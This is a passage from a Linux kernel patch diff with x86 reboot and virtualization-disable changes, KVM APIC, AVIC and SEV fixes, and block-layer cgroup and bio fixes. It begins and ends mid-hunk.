++		cpu_emergency_disable_virtualization();
+ 
+-		/* Halt and exit VMX root operation on the other CPUs. */
+-		nmi_shootdown_cpus(vmxoff_nmi);
++		/* Disable VMX/SVM and halt on other CPUs. */
++		nmi_shootdown_cpus_on_restart();
+ 	}
+ }
+ 
+@@ -590,7 +586,7 @@ static void native_machine_emergency_restart(void)
+ 	unsigned short mode;
+ 
+ 	if (reboot_emergency)
+-		emergency_vmx_disable_all();
++		emergency_reboot_disable_virtualization();
+ 
+ 	tboot_shutdown(TB_SHUTDOWN_REBOOT);
+ 
+@@ -795,6 +791,17 @@ void machine_crash_shutdown(struct pt_regs *regs)
+ /* This is the CPU performing the emergency shutdown work. */
+ int crashing_cpu = -1;
+ 
++/*
++ * Disable virtualization, i.e. VMX or SVM, to ensure INIT is recognized during
++ * reboot.  VMX blocks INIT if the CPU is post-VMXON, and SVM blocks INIT if
++ * GIF=0, i.e. if the crash occurred between CLGI and STGI.
++ */
++void cpu_emergency_disable_virtualization(void)
++{
++	cpu_emergency_vmxoff();
++	cpu_emergency_svm_disable();
++}
++
+ #if defined(CONFIG_SMP)
+ 
+ static nmi_shootdown_cb shootdown_callback;
+@@ -817,7 +824,14 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 		return NMI_HANDLED;
+ 	local_irq_disable();
+ 
+-	shootdown_callback(cpu, regs);
++	if (shootdown_callback)
++		shootdown_callback(cpu, regs);
++
++	/*
++	 * Prepare the CPU for reboot _after_ invoking the callback so that the
++	 * callback can safely use virtualization instructions, e.g. VMCLEAR.
++	 */
++	cpu_emergency_disable_virtualization();
+ 
+ 	atomic_dec(&waiting_for_crash_ipi);
+ 	/* Assume hlt works */
+@@ -828,18 +842,32 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	return NMI_HANDLED;
+ }
+ 
+-/*
+- * Halt all other CPUs, calling the specified function on each of them
++/**
++ * nmi_shootdown_cpus - Stop other CPUs via NMI
++ * @callback:	Optional callback to be invoked from the NMI handler
++ *
++ * The NMI handler on the remote CPUs invokes @callback, if not
++ * NULL, first and then disables virtualization to ensure that
++ * INIT is recognized during reboot.
+  *
+- * This function can be used to halt all other CPUs on crash
+- * or emergency reboot time. The function passed as parameter
+- * will be called inside a NMI handler on all CPUs.
++ * nmi_shootdown_cpus() can only be invoked once. After the first
++ * invocation all other CPUs are stuck in crash_nmi_callback() and
++ * cannot respond to a second NMI.
+  */
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ {
+ 	unsigned long msecs;
++
+ 	local_irq_disable();
+ 
++	/*
++	 * Avoid certain doom if a shootdown already occurred; re-registering
++	 * the NMI handler will cause list corruption, modifying the callback
++	 * will do who knows what, etc...
++	 */
++	if (WARN_ON_ONCE(crash_ipi_issued))
++		return;
++
+ 	/* Make a note of crashing cpu. Will be used in NMI callback. */
+ 	crashing_cpu = safe_smp_processor_id();
+ 
+@@ -867,7 +895,17 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 		msecs--;
+ 	}
+ 
+-	/* Leave the nmi callback set */
++	/*
++	 * Leave the nmi callback set, shootdown is a one-time thing.  Clearing
++	 * the callback could result in a NULL pointer dereference if a CPU
++	 * (finally) responds after the timeout expires.
++	 */
++}
++
++static inline void nmi_shootdown_cpus_on_restart(void)
++{
++	if (!crash_ipi_issued)
++		nmi_shootdown_cpus(NULL);
+ }
+ 
+ /*
+@@ -897,6 +935,8 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 	/* No other CPUs to shoot down */
+ }
+ 
++static inline void nmi_shootdown_cpus_on_restart(void) { }
++
+ void run_crash_ipi_callback(struct pt_regs *regs)
+ {
+ }
+diff --git a/arch/x86/kernel/signal.c b/arch/x86/kernel/signal.c
+index 9c7265b524c73..82c562e2cc982 100644
+--- a/arch/x86/kernel/signal.c
++++ b/arch/x86/kernel/signal.c
+@@ -923,7 +923,7 @@ static bool strict_sigaltstack_size __ro_after_init = false;
+ 
+ static int __init strict_sas_size(char *arg)
+ {
+-	return kstrtobool(arg, &strict_sigaltstack_size);
++	return kstrtobool(arg, &strict_sigaltstack_size) == 0;
+ }
+ __setup("strict_sas_size", strict_sas_size);
+ 
+diff --git a/arch/x86/kernel/smp.c b/arch/x86/kernel/smp.c
+index 06db901fabe8e..375b33ecafa27 100644
+--- a/arch/x86/kernel/smp.c
++++ b/arch/x86/kernel/smp.c
+@@ -32,7 +32,7 @@
+ #include <asm/mce.h>
+ #include <asm/trace/irq_vectors.h>
+ #include <asm/kexec.h>
+-#include <asm/virtext.h>
++#include <asm/reboot.h>
+ 
+ /*
+  *	Some notes on x86 processor bugs affecting SMP operation:
+@@ -122,7 +122,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	if (raw_smp_processor_id() == atomic_read(&stopping_cpu))
+ 		return NMI_HANDLED;
+ 
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ 
+ 	return NMI_HANDLED;
+@@ -134,7 +134,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ DEFINE_IDTENTRY_SYSVEC(sysvec_reboot)
+ {
+ 	ack_APIC_irq();
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ }
+ 
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index bf5ce862c4daf..68eba393842f5 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2072,10 +2072,18 @@ static void kvm_lapic_xapic_id_updated(struct kvm_lapic *apic)
+ {
+ 	struct kvm *kvm = apic->vcpu->kvm;
+ 
++	if (!kvm_apic_hw_enabled(apic))
++		return;
++
+ 	if (KVM_BUG_ON(apic_x2apic_mode(apic), kvm))
+ 		return;
+ 
+-	if (kvm_xapic_id(apic) == apic->vcpu->vcpu_id)
++	/*
++	 * Deliberately truncate the vCPU ID when detecting a modified APIC ID
++	 * to avoid false positives if the vCPU ID, i.e. x2APIC ID, is a 32-bit
++	 * value.
++	 */
++	if (kvm_xapic_id(apic) == (u8)apic->vcpu->vcpu_id)
+ 		return;
+ 
+ 	kvm_set_apicv_inhibit(apic->vcpu->kvm, APICV_INHIBIT_REASON_APIC_ID_MODIFIED);
+@@ -2219,10 +2227,14 @@ static int kvm_lapic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val)
+ 		break;
+ 
+ 	case APIC_SELF_IPI:
+-		if (apic_x2apic_mode(apic))
+-			kvm_apic_send_ipi(apic, APIC_DEST_SELF | (val & APIC_VECTOR_MASK), 0);
+-		else
++		/*
++		 * Self-IPI exists only when x2APIC is enabled.  Bits 7:0 hold
++		 * the vector, everything else is reserved.
++		 */
++		if (!apic_x2apic_mode(apic) || (val & ~APIC_VECTOR_MASK))
+ 			ret = 1;
++		else
++			kvm_apic_send_ipi(apic, APIC_DEST_SELF | val, 0);
+ 		break;
+ 	default:
+ 		ret = 1;
+@@ -2284,23 +2296,18 @@ void kvm_apic_write_nodecode(struct kvm_vcpu *vcpu, u32 offset)
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+ 	u64 val;
+ 
+-	if (apic_x2apic_mode(apic)) {
+-		if (KVM_BUG_ON(kvm_lapic_msr_read(apic, offset, &val), vcpu->kvm))
+-			return;
+-	} else {
+-		val = kvm_lapic_get_reg(apic, offset);
+-	}
+-
+ 	/*
+ 	 * ICR is a single 64-bit register when x2APIC is enabled.  For legacy
+ 	 * xAPIC, ICR writes need to go down the common (slightly slower) path
+ 	 * to get the upper half from ICR2.
+ 	 */
+ 	if (apic_x2apic_mode(apic) && offset == APIC_ICR) {
++		val = kvm_lapic_get_reg64(apic, APIC_ICR);
+ 		kvm_apic_send_ipi(apic, (u32)val, (u32)(val >> 32));
+ 		trace_kvm_apic_write(APIC_ICR, val);
+ 	} else {
+ 		/* TODO: optimize to just emulate side effect w/o one more write */
++		val = kvm_lapic_get_reg(apic, offset);
+ 		kvm_lapic_reg_write(apic, offset, (u32)val);
+ 	}
+ }
+@@ -2429,6 +2436,7 @@ void kvm_apic_update_apicv(struct kvm_vcpu *vcpu)
+ 		 */
+ 		apic->isr_count = count_vectors(apic->regs + APIC_ISR);
+ 	}
++	apic->highest_isr_cache = -1;
+ }
+ EXPORT_SYMBOL_GPL(kvm_apic_update_apicv);
+ 
+@@ -2485,7 +2493,6 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+ 		kvm_lapic_set_reg(apic, APIC_TMR + 0x10 * i, 0);
+ 	}
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	update_divide_count(apic);
+ 	atomic_set(&apic->lapic_timer.pending, 0);
+ 
+@@ -2773,7 +2780,6 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	__start_apic_timer(apic, APIC_TMCCT);
+ 	kvm_lapic_set_reg(apic, APIC_TMCCT, 0);
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	if (apic->apicv_active) {
+ 		static_call_cond(kvm_x86_apicv_post_state_restore)(vcpu);
+ 		static_call_cond(kvm_x86_hwapic_irr_update)(vcpu, apic_find_highest_irr(apic));
+@@ -2944,13 +2950,17 @@ static int kvm_lapic_msr_read(struct kvm_lapic *apic, u32 reg, u64 *data)
+ static int kvm_lapic_msr_write(struct kvm_lapic *apic, u32 reg, u64 data)
+ {
+ 	/*
+-	 * ICR is a 64-bit register in x2APIC mode (and Hyper'v PV vAPIC) and
++	 * ICR is a 64-bit register in x2APIC mode (and Hyper-V PV vAPIC) and
+ 	 * can be written as such, all other registers remain accessible only
+ 	 * through 32-bit reads/writes.
+ 	 */
+ 	if (reg == APIC_ICR)
+ 		return kvm_x2apic_icr_write(apic, data);
+ 
++	/* Bits 63:32 are reserved in all other registers. */
++	if (data >> 32)
++		return 1;
++
+ 	return kvm_lapic_reg_write(apic, reg, (u32)data);
+ }
+ 
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 6919dee69f182..97ad0661f9639 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -86,6 +86,12 @@ static void avic_activate_vmcb(struct vcpu_svm *svm)
+ 		/* Disabling MSR intercept for x2APIC registers */
+ 		svm_set_x2apic_msr_interception(svm, false);
+ 	} else {
++		/*
++		 * Flush the TLB, the guest may have inserted a non-APIC
++		 * mapping into the TLB while AVIC was disabled.
++		 */
++		kvm_make_request(KVM_REQ_TLB_FLUSH_CURRENT, &svm->vcpu);
++
+ 		/* For xAVIC and hybrid-xAVIC modes */
+ 		vmcb->control.avic_physical_id |= AVIC_MAX_PHYSICAL_ID;
+ 		/* Enabling MSR intercept for x2APIC registers */
+@@ -496,14 +502,18 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 	trace_kvm_avic_incomplete_ipi(vcpu->vcpu_id, icrh, icrl, id, index);
+ 
+ 	switch (id) {
++	case AVIC_IPI_FAILURE_INVALID_TARGET:
+ 	case AVIC_IPI_FAILURE_INVALID_INT_TYPE:
+ 		/*
+ 		 * Emulate IPIs that are not handled by AVIC hardware, which
+-		 * only virtualizes Fixed, Edge-Triggered INTRs.  The exit is
+-		 * a trap, e.g. ICR holds the correct value and RIP has been
+-		 * advanced, KVM is responsible only for emulating the IPI.
+-		 * Sadly, hardware may sometimes leave the BUSY flag set, in
+-		 * which case KVM needs to emulate the ICR write as well in
++		 * only virtualizes Fixed, Edge-Triggered INTRs, and falls over
++		 * if _any_ targets are invalid, e.g. if the logical mode mask
++		 * is a superset of running vCPUs.
++		 *
++		 * The exit is a trap, e.g. ICR holds the correct value and RIP
++		 * has been advanced, KVM is responsible only for emulating the
++		 * IPI.  Sadly, hardware may sometimes leave the BUSY flag set,
++		 * in which case KVM needs to emulate the ICR write as well in
+ 		 * order to clear the BUSY flag.
+ 		 */
+ 		if (icrl & APIC_ICR_BUSY)
+@@ -519,8 +529,6 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 		 */
+ 		avic_kick_target_vcpus(vcpu->kvm, apic, icrl, icrh, index);
+ 		break;
+-	case AVIC_IPI_FAILURE_INVALID_TARGET:
+-		break;
+ 	case AVIC_IPI_FAILURE_INVALID_BACKING_PAGE:
+ 		WARN_ONCE(1, "Invalid backing page\n");
+ 		break;
+@@ -739,18 +747,6 @@ void avic_apicv_post_state_restore(struct kvm_vcpu *vcpu)
+ 	avic_handle_ldr_update(vcpu);
+ }
+ 
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu)
+-{
+-	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
+-		return;
+-
+-	if (kvm_get_apic_mode(vcpu) == LAPIC_MODE_INVALID) {
+-		WARN_ONCE(true, "Invalid local APIC state (vcpu_id=%d)", vcpu->vcpu_id);
+-		return;
+-	}
+-	avic_refresh_apicv_exec_ctrl(vcpu);
+-}
+-
+ static int avic_set_pi_irte_mode(struct kvm_vcpu *vcpu, bool activate)
+ {
+ 	int ret = 0;
+@@ -1092,17 +1088,18 @@ void avic_vcpu_put(struct kvm_vcpu *vcpu)
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
+ }
+ 
+-
+-void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 	struct vmcb *vmcb = svm->vmcb01.ptr;
+-	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
++		return;
+ 
+ 	if (!enable_apicv)
+ 		return;
+ 
+-	if (activated) {
++	if (kvm_vcpu_apicv_active(vcpu)) {
+ 		/**
+ 		 * During AVIC temporary deactivation, guest could update
+ 		 * APIC ID, DFR and LDR registers, which would not be trapped
+@@ -1116,6 +1113,16 @@ void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
+ 		avic_deactivate_vmcb(svm);
+ 	}
+ 	vmcb_mark_dirty(vmcb, VMCB_AVIC);
++}
++
++void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++{
++	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!enable_apicv)
++		return;
++
++	avic_refresh_virtual_apic_mode(vcpu);
+ 
+ 	if (activated)
+ 		avic_vcpu_load(vcpu, vcpu->cpu);
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index efaaef2b7ae11..4cb2e483db533 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1293,7 +1293,7 @@ static int sev_send_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* Pin guest memory */
+@@ -1473,7 +1473,7 @@ static int sev_receive_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	hdr = psp_copy_user_blob(params.hdr_uaddr, params.hdr_len);
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 0434bb7b456bd..bfe93a1c4f92e 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -4757,7 +4757,7 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.enable_nmi_window = svm_enable_nmi_window,
+ 	.enable_irq_window = svm_enable_irq_window,
+ 	.update_cr8_intercept = svm_update_cr8_intercept,
+-	.set_virtual_apic_mode = avic_set_virtual_apic_mode,
++	.set_virtual_apic_mode = avic_refresh_virtual_apic_mode,
+ 	.refresh_apicv_exec_ctrl = avic_refresh_apicv_exec_ctrl,
+ 	.check_apicv_inhibit_reasons = avic_check_apicv_inhibit_reasons,
+ 	.apicv_post_state_restore = avic_apicv_post_state_restore,
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index 199a2ecef1cec..bbc061f3a2b37 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -645,7 +645,7 @@ void avic_vcpu_blocking(struct kvm_vcpu *vcpu);
+ void avic_vcpu_unblocking(struct kvm_vcpu *vcpu);
+ void avic_ring_doorbell(struct kvm_vcpu *vcpu);
+ unsigned long avic_vcpu_get_apicv_inhibit_reasons(struct kvm_vcpu *vcpu);
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu);
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu);
+ 
+ 
+ /* sev.c */
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index e2fc593804657..4387173576d5e 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -28,7 +28,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ 		hve->hv_enlightenments_control.msr_bitmap = 1;
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ 	if (npt_enabled &&
+ 	    ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB) {
+@@ -85,7 +85,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ }
+ 
+diff --git a/arch/x86/kvm/vmx/evmcs.h b/arch/x86/kvm/vmx/evmcs.h
+index 6f746ef3c0386..1bc4e8408b4b2 100644
+--- a/arch/x86/kvm/vmx/evmcs.h
++++ b/arch/x86/kvm/vmx/evmcs.h
+@@ -188,16 +188,6 @@ static inline u16 evmcs_read16(unsigned long field)
+ 	return *(u16 *)((char *)current_evmcs + offset);
+ }
+ 
+-static inline void evmcs_touch_msr_bitmap(void)
+-{
+-	if (unlikely(!current_evmcs))
+-		return;
+-
+-	if (current_evmcs->hv_enlightenments_control.msr_bitmap)
+-		current_evmcs->hv_clean_fields &=
+-			~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
+-}
+-
+ static inline void evmcs_load(u64 phys_addr)
+ {
+ 	struct hv_vp_assist_page *vp_ap =
+@@ -217,7 +207,6 @@ static inline u64 evmcs_read64(unsigned long field) { return 0; }
+ static inline u32 evmcs_read32(unsigned long field) { return 0; }
+ static inline u16 evmcs_read16(unsigned long field) { return 0; }
+ static inline void evmcs_load(u64 phys_addr) {}
+-static inline void evmcs_touch_msr_bitmap(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ #define EVMPTR_INVALID (-1ULL)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 95ed874fbbcc3..f5c1cb7cec8a7 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -3839,8 +3839,13 @@ static void vmx_msr_bitmap_l01_changed(struct vcpu_vmx *vmx)
+ 	 * 'Enlightened MSR Bitmap' feature L0 needs to know that MSR
+ 	 * bitmap has changed.
+ 	 */
+-	if (static_branch_unlikely(&enable_evmcs))
+-		evmcs_touch_msr_bitmap();
++	if (IS_ENABLED(CONFIG_HYPERV) && static_branch_unlikely(&enable_evmcs)) {
++		struct hv_enlightened_vmcs *evmcs = (void *)vmx->vmcs01.vmcs;
++
++		if (evmcs->hv_enlightenments_control.msr_bitmap)
++			evmcs->hv_clean_fields &=
++				~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
++	}
+ 
+ 	vmx->nested.force_msr_bitmap_recalc = true;
+ }
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 3f5685c00e360..91ffee6fc8cb4 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -418,6 +418,7 @@ int bio_integrity_clone(struct bio *bio, struct bio *bio_src,
+ 
+ 	bip->bip_vcnt = bip_src->bip_vcnt;
+ 	bip->bip_iter = bip_src->bip_iter;
++	bip->bip_flags = bip_src->bip_flags & ~BIP_BLOCK_INTEGRITY;
+ 
+ 	return 0;
+ }
+diff --git a/block/bio.c b/block/bio.c
+index 57c2f327225bd..d5cd825d6efc0 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -747,6 +747,7 @@ void bio_put(struct bio *bio)
+ 		bio_uninit(bio);
+ 		cache = per_cpu_ptr(bio->bi_pool->cache, get_cpu());
+ 		bio->bi_next = cache->free_list;
++		bio->bi_bdev = NULL;
+ 		cache->free_list = bio;
+ 		if (++cache->nr > ALLOC_CACHE_MAX + ALLOC_CACHE_SLACK)
+ 			bio_alloc_cache_prune(cache, ALLOC_CACHE_SLACK);
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 7c91d9195da8d..f8b21bead6552 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -87,14 +87,32 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
++	struct request_queue *q = blkg->q;
+ 	int i;
+ 
++	/*
++	 * pd_free_fn() can also be called from blkcg_deactivate_policy(),
++	 * in order to make sure pd_free_fn() is called in order, the deletion
++	 * of the list blkg->q_node is delayed to here from blkg_destroy(), and
++	 * blkcg_mutex is used to synchronize blkg_free_workfn() and
++	 * blkcg_deactivate_policy().
++	 */
++	if (q)
++		mutex_lock(&q->blkcg_mutex);
++
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->q)
+-		blk_put_queue(blkg->q);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
++
++	if (q) {
++		list_del_init(&blkg->q_node);
++		mutex_unlock(&q->blkcg_mutex);
++		blk_put_queue(q);
++	}
++
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -127,8 +145,6 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -425,9 +441,14 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/* Something wrong if we are trying to remove same group twice */
+-	WARN_ON_ONCE(list_empty(&blkg->q_node));
+-	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
++	/*
++	 * blkg stays on the queue list until blkg_free_workfn(), see details in
++	 * blkg_free_workfn(), hence this function can be called from
++	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
++	 * blkg_free_workfn().
++	 */
++	if (hlist_unhashed(&blkg->blkcg_node))
++		return;
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
+@@ -439,7 +460,6 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
+-	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1226,6 +1246,7 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
++	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1463,6 +1484,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
++	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1481,6 +1503,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
++	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 5487912befe89..24ee7785a5ad5 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -672,6 +672,18 @@ static void __submit_bio_noacct_mq(struct bio *bio)
+ 
+ void submit_bio_noacct_nocheck(struct bio *bio)
+ {
++	blk_cgroup_bio_start(bio);
++	blkcg_bio_issue_init(bio);
++
++	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
++		trace_block_bio_queue(bio);
++		/*
++		 * Now that enqueuing has been traced, we need to trace
++		 * completion as well.
++		 */
++		bio_set_flag(bio, BIO_TRACE_COMPLETION);
++	}
++
+ 	/*
+ 	 * We only want one ->submit_bio to be active at a time, else stack
+ 	 * usage with stacked devices could be a problem.  Use current->bio_list
+@@ -776,17 +788,6 @@ void submit_bio_noacct(struct bio *bio)
+ 
+ 	if (blk_throtl_bio(bio))
+ 		return;
+-
+-	blk_cgroup_bio_start(bio);
+-	blkcg_bio_issue_init(bio);
+-
+-	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
+-		trace_block_bio_queue(bio);
+-		/* Now that enqueuing has been traced, we need to trace
+-		 * completion as well.
+-		 */
+-		bio_set_flag(bio, BIO_TRACE_COMPLETION);
+-	}
+ 	submit_bio_noacct_nocheck(bio);
+ 	return;
+ 
+@@ -841,10 +842,16 @@ EXPORT_SYMBOL(submit_bio);
+  */
+ int bio_poll(struct bio *bio, struct io_comp_batch *iob, unsigned int flags)
+ {
+-	struct request_queue *q = bdev_get_queue(bio->bi_bdev);
+ 	blk_qc_t cookie = READ_ONCE(bio->bi_cookie);
++	struct block_device *bdev;
++	struct request_queue *q;
+ 	int ret = 0;
+ 
++	bdev = READ_ONCE(bio->bi_bdev);
++	if (!bdev)
++		return 0;
++
++	q = bdev_get_queue(bdev);
+ 	if (cookie == BLK_QC_T_NONE ||
+ 	    !test_bit(QUEUE_FLAG_POLL, &q->queue_flags))
+ 		return 0;
+@@ -904,7 +911,7 @@ int iocb_bio_iopoll(struct kiocb *kiocb, struct io_comp_batch *iob,
+ 	 */
+ 	rcu_read_lock();
+ 	bio = READ_ONCE(kiocb->private);
+-	if (bio && bio->bi_bdev)
++	if (bio)
+ 		ret = bio_poll(bio, iob, flags);
+ 	rcu_read_unlock();
+ 
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 495396425bade..bfc33fa9a063c 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -865,9 +865,14 @@ static void calc_lcoefs(u64 bps, u64 seqiops, u64 randiops,
+ 
+ 	*page = *seqio = *randio = 0;
+ 
+-	if (bps)
+-		*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC,
+-					   DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE));
++	if (bps) {
++		u64 bps_pages = DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE);
++
++		if (bps_pages)
++			*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC, bps_pages);
++		else
++			*page = 1;
++	}
+ 
+ 	if (seqiops) {
+ 		v = DIV64_U64_ROUND_UP(VTIME_PER_SEC, seqiops);
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index 84f03d066cb31..17ac532105a97 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -747,6 +747,33 @@ void blk_rq_set_mixed_merge(struct request *rq)
+ 	rq->rq_flags |= RQF_MIXED_MERGE;
+ }
+ 
++static inline blk_opf_t bio_failfast(const struct bio *bio)
++{
++	if (bio->bi_opf & REQ_RAHEAD)
++		return REQ_FAILFAST_MASK;
++
++	return bio->bi_opf & REQ_FAILFAST_MASK;
++}
++
++/*
++ * After we are marked as MIXED_MERGE, any new RA bio has to be updated
++ * as failfast, and request's failfast has to be updated in case of
++ * front merge.
++ */
++static inline void blk_update_mixed_merge(struct request *req,
++		struct bio *bio, bool front_merge)
++{
++	if (req->rq_flags & RQF_MIXED_MERGE) {
++		if (bio->bi_opf & REQ_RAHEAD)
++			bio->bi_opf |= REQ_FAILFAST_MASK;
++
++		if (front_merge) {
++			req->cmd_flags &= ~REQ_FAILFAST_MASK;
++			req->cmd_flags |= bio->bi_opf & REQ_FAILFAST_MASK;
++		}
++	}
++}
++
+ static void blk_account_io_merge_request(struct request *req)
+ {
+ 	if (blk_do_io_stat(req)) {
+@@ -944,7 +971,7 @@ enum bio_merge_status {
+ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
